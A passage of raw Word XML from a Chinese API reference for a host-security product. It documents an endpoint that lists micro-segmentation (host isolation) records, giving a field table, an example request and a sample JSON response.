      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E88C50C"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173"/>
        <w:gridCol w:w="902"/>
        <w:gridCol w:w="926"/>
        <w:gridCol w:w="7081"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="49DA8C1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FFC52C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E0041AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE4A28E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503CDC41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07F8E5A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603C5BF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="069FF862" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4208742F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595E0BD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1541B72A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="728E7055" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D787014" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70708B33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28991EDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="747E4848" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="151C868D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02627CDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175CA8CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C40EF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>隔离状态,1：隔离中,2：隔离成功,3：隔离失败,4：修改中,5：修改失败,6：解除中,7：解除失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FD53720" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BA7E15A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="627D0273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D3DDED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF5B95F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61ECB6E2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B0704A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68D07A0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20E76D9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6964FA8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26D03083" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5130D6C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59ABEECC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F500E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59302389" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B8AAC95" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE1E117" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4384FE7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60238754" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E0B88C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C67D814" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="020BA0C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1322D0AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39AC380B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EEEDB82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46D9468A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1873FCB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/segmentation/list?page=0&amp;size=50&amp;groups=1,2&amp;sorts=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>updatedTime,-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2D77E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01BC89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "61d7b2de27b7b26916736511",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fa27259dae9af8a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updatedTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1641525982,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remoteLoginEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.253.128",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIpBak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localhost.localdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onlineStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "192.168.1.100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "172.16.2.187"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "80",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "81",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "82"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "operation": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>micro_segmentation_add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "error": "主机离线",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "direction": "out"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AAC3B6"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2212"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="7093"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="53A466C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7230532" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="058B0E2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42ABCB55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="423B220C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6508A807" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1823016B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11FA166E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="786F76EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71960704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23980A6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD5000B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F0D1365" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6731F5CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AFB0FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29258286" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="37D6D679" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53ADC376" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C30616E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77169173" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E35B479" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47EEB6CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remoteLoginEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BE79DF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA37E6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开启远程登录 0-关闭，1-开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31AEC41C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D596B7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A7D52AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D9C6DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21771D4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
